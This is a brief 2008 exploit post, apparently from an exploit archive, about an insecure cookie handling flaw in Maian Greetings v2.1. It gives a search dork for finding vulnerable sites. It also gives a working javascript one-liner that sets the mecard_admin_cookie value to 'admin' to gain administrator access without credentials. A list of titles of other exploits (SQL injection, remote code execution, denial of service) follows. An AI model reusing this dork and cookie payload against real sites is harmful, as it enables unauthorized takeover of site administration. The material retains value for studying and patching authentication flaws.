Author: Saime
Date: July 12, 2008
Script: Maian Greetings v2.1 Insecure Cookie Handling Vulnerability
URL: http://www.maianscriptworld.co.uk
Dork: Powered by: Maian Greetings v2.1
Description:
Maian Greetings v2.1 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mecard_admin_cookie,
equals admin username.
Exploit:
javascript:document.cookie = "mecard_admin_cookie=admin; path=/php/demos/greetings/admin/"
【Maian Greetings 2.1 Insecure Cookie Handling Vulnerability】相关文章:
★ Yahoo Messenger 8.1 ActiveX Remote Denial of Service Exploit
★ PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit
★ HockeySTATS Online 2.0 Multiple Remote SQL Injection Vulnerabilities
★ VMware Workstation (hcmon.sys 6.0.0.45731) Local DoS Vulnerability
★ Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability
★ Maian Music 1.0 Insecure Cookie Handling Vulnerability
★ WebCMS Portal Edition (id) Remote SQL Injection Vulnerability
★ webEdition CMS (we_objectID) Blind SQL Injection Exploit
★ MojoClassifieds 2.0 Remote Blind SQL Injection Exploit